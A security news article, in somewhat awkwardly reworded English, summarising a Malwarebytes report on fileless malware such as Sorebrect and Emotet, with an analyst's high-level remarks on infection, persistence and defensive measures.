Malwarebytes Fileless Ransomware: An emerging threat to the United States

Malwarebytes ransomware

A new report on malware bytes examines Sorebrect, a fileless threat to ransomware detected in the US. Together with three other fileless attacks this year.

According to a new Malwarebytes report, a completely fileless ransomware known as Sorebrect is “one of the first of its kind “to combine traditional ransom functionality with fileless tactics.

In ” Under the Radar: The Future of Undetected Malware, ” Malwarebytes detailed four fileless attacks, including Emotet, TrickBot, SamSam and Sorebrect, observed throughout 2018. The report referred to a study by the Ponemon Institute that states that ” fileless malware attacks are estimated to account for 35 percent of all attacks in 2018 and are nearly 10 times more likely to succeed than file – based attacks. ” For example, Malwarebytes stated that ” Emotet malware was detected and removed more than 1.5 million times using Malwarebytes between January and September 2018. ”

While Emotet was found to be most active in the United States, an increase in activity was also seen globally in counties such as the United Kingdom, the Philippines and Canada.

One of the biggest targets in the United States Texas was for Emotet. Adam Kujawa, Malware Intelligence Director at Malwarebytes, based in Santa Clara, California, said that he believes this is because Texas has a large population, a number of military bases and a growing technology industry.

Sorebrect has also gone to the United States. It was first seen in the Middle East in 2017 that the networks of mainly manufacturing companies were infected. But Malwarebytes said that in several states, including Missouri and Tennessee, the fileless ransomware was found this year. “For us, this threat has not been very widespread and we have not yet seen any copycats of this feature making large splashes, ” the report said.”

However, it’s just a matter of time before someone perfects this infection method and computer use becomes a bigger risk. ” Kujawa said Sorebrect combines traditional ransom features with fileless tactics and network share targets. ” Right now, the most popular ransomware, GandCrab, has all sorts of abilities. The fact is, however, that[ Sorebrect] is a new development of ransomware, something we haven’t seen before. And in the near future it is almost certain to be copied, ” said Kujawa. ” The main form of infection in fileless malware is either exploited by an exploit script or exploited by a malicious Office document. In any case, it allows the ransomware to stay in memory without putting anything on the disk and hanging for as long as it wants until it wants to start encrypting things.”

The risk of Sorebrect poses becomes clearer, as it does not need a person to start it. Although its delivery mechanism is not fully known, Kujawa said that fileless ransomware is believed to be partially distributed through exploit kits and malicious spam campaigns.

“When it’s on the system, what usually happens to any kind of fileless malware is that it finds a way to resist. Otherwise it’s gone once you leave it with your computer, “said Kujawa. ” So, they will create malformed registry entries or keys in many cases and have code in them. And every time the computer reboots, the code reaches out, picks up the malware and reinfects the system.

With Sorebrect, since it can encrypt everything, I imagine that it probably becomes known after the initial infection and once it begins to encrypt. “In order to protect against threats such as fileless ransomware, the report recommends that companies extend their current protection beyond signature – based malware detection and behavioral detection.

In addition, Malwarebytes suggested that companies focus more on blocking threat delivery mechanisms, especially e – mail messages, and using self – defense security products that can prevent malware from disabling or removing it from a system.

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.